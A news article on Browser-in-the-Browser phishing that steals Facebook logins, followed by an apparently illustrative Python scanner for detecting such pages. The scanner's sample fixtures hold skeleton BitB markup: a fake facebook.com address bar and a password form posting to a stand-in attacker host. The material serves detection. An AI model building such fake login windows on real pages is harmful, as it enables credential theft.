Hackers are increasingly using a new and highly deceptive technique called Browser-in-the-Browser (BitB) to steal Facebook login details, catching even careful users off guard.
According to a report by the cybersecurity firm Trellix, there has been a sharp increase in attacks using the BitB method that tricks people into handing over their Facebook usernames and passwords. This technique creates a fake login window that resembles a real Facebook pop-up, making the scam extremely difficult to spot.
How The Scam Works
Most BitB attacks begin with phishing emails or messages designed to create urgency. In a typical attack, users receive an alarming message claiming to be from Facebook, Meta, or even law firms. The message may warn about copyright infringement, suspicious login attempts, or an impending account suspension. To fix the issue, users are urged to click a link.
When users click the link, they are taken to an attacker-controlled webpage where a fake browser pop-up suddenly appears, asking the user to log in to Facebook. While it looks legitimate — complete with Facebook branding and a familiar web address — the window is actually part of the webpage itself, created using hidden web elements called iframes.
Once the user enters their login details, the details are immediately sent to the attackers, who can then take over the account.
Why This Trick Is So Dangerous
The BitB method was first demonstrated by the security researcher mr.d0x in 2022 as a proof of concept. Criminals quickly adopted it because it takes advantage of something most people trust: familiar login pop-ups.
What makes these campaigns especially dangerous is their use of legitimate cloud hosting services such as Netlify and Vercel, and their habit of hiding malicious links behind shortened URLs and fake Meta CAPTCHA pages. Since these services are widely trusted, security filters are less likely to block them, and users are more likely to assume the pages are safe.
Why Facebook Remains A Major Target
With more than three billion active users worldwide, Facebook remains one of the most attractive targets for cybercriminals. Stolen accounts are commonly used to spread scams, steal personal information, or carry out identity fraud, often by exploiting trust within the victim’s social network.
How To Protect Yourself
Trellix warns that traditional visual checks are no longer enough to detect modern phishing scams. However, users can reduce their risk by following a few simple but effective steps to stay safe:
- Avoid clicking links in unsolicited emails or messages that claim your Facebook account is at risk. Instead, open a new tab and go directly to facebook.com to check account alerts.
- Be cautious of login pop-ups and try dragging them outside the browser window. A genuine pop-up is a separate window and can be moved beyond the edge of the page; a BitB window is part of the page and cannot leave it.
- Check the real address bar, not the URL shown inside the pop-up.
- Enable two-factor authentication (2FA) on your Facebook account. This adds an extra layer of protection even if passwords are stolen.
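The "check the real address bar" advice can also be turned into a scan. The script below is an added, hypothetical example written for this article; it is not Trellix tooling and not a reproduction of any phishing kit. It relies only on the point the article makes: a BitB "pop-up" is ordinary page content, so the hostname painted into its fake address bar can be compared against the hosts the page is really served from or really loads (the top-level location, iframe `src` values, form `action` targets). The sample pages, the host names `attacker.example` and `news.example`, and the function names are all constructed for the example.

```python
"""Heuristic scanner for Browser-in-the-Browser (BitB) login pages.

Hypothetical example for this article, not Trellix code and not a phishing
kit. Real address bars are browser chrome, never document content, so a URL
rendered as page text next to an iframe or password form is the BitB tell.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_TEXT = re.compile(r"https?://[A-Za-z0-9.-]+")


def host_of(url, default=""):
    """Hostname of an absolute URL; relative URLs resolve to `default`."""
    return (urlparse(url).hostname or default).lower()


def same_site(a, b):
    """Loose match: equal, or one host is a subdomain of the other."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


class PageScanner(HTMLParser):
    """Collects the facts the heuristics need from raw HTML."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.displayed_hosts = set()      # hostnames that appear as visible text
        self.loaded_hosts = {page_host}   # hosts the page is really served from
        self.form_hosts = set()           # where forms would submit credentials
        self.has_iframe = False
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.has_iframe = True
            self.loaded_hosts.add(host_of(a["src"], self.page_host))
        elif tag == "form":
            self.form_hosts.add(host_of(a.get("action") or "", self.page_host))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True

    def handle_data(self, data):
        for url in URL_TEXT.findall(data):
            self.displayed_hosts.add(host_of(url))


def scan_for_bitb(html, page_host):
    """Return a list of findings; an empty list means nothing suspicious."""
    s = PageScanner(page_host.lower())
    s.feed(html)
    findings = []
    login_context = s.has_password_field or s.has_iframe
    # Heuristic 1: a URL is painted as text, but in a login context nothing on
    # the page is actually served from that host (the fake address bar).
    if login_context:
        for shown in sorted(s.displayed_hosts):
            if not any(same_site(shown, real) for real in s.loaded_hosts):
                findings.append(f"fake address bar: text shows {shown} but the "
                                f"page only loads from {sorted(s.loaded_hosts)}")
    # Heuristic 2: a password form submits somewhere other than the host the
    # page claims to be (the displayed URL if any, else the page itself).
    if s.has_password_field:
        claimed = s.displayed_hosts or {s.page_host}
        for target in sorted(s.form_hosts):
            if not any(same_site(target, c) for c in claimed):
                findings.append(f"credential form posts to {target}, "
                                f"not {sorted(claimed)}")
    return findings


# Constructed samples: the BitB skeleton the article describes (iframe and
# inline-form variants) plus a benign login page for comparison.
BITB_IFRAME_PAGE = """<div class="fake-window">
  <div class="fake-address-bar">https://www.facebook.com/login.php</div>
  <iframe src="https://attacker.example/clone.html"></iframe></div>"""

BITB_INLINE_PAGE = """<div class="fake-window">
  <span class="fake-address-bar">https://www.facebook.com/</span>
  <form action="https://attacker.example/collect" method="post">
    <input type="text" name="email"><input type="password" name="pass">
  </form></div>"""

BENIGN_LOGIN_PAGE = """<form action="/login/" method="post">
  <input type="text" name="email"><input type="password" name="pass">
</form><p>Need help? Visit https://www.facebook.com/help</p>"""

if __name__ == "__main__":
    for name, html, host in [("bitb-iframe", BITB_IFRAME_PAGE, "attacker.example"),
                             ("bitb-inline", BITB_INLINE_PAGE, "attacker.example"),
                             ("benign", BENIGN_LOGIN_PAGE, "www.facebook.com")]:
        print(name, scan_for_bitb(html, host) or "clean")
```

The scanner only sees the top-level document, so in the iframe variant the credential form lives inside the framed document and is caught by the first heuristic alone; feeding the iframe's own HTML through `scan_for_bitb` with its real host covers the second. A plain article that merely mentions a Facebook URL is not flagged, because heuristic 1 only fires when the page also contains an iframe or a password field.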
As phishing techniques continue to evolve, experts stress that staying cautious — and slowing down before clicking — may be the best defense to protect online accounts.
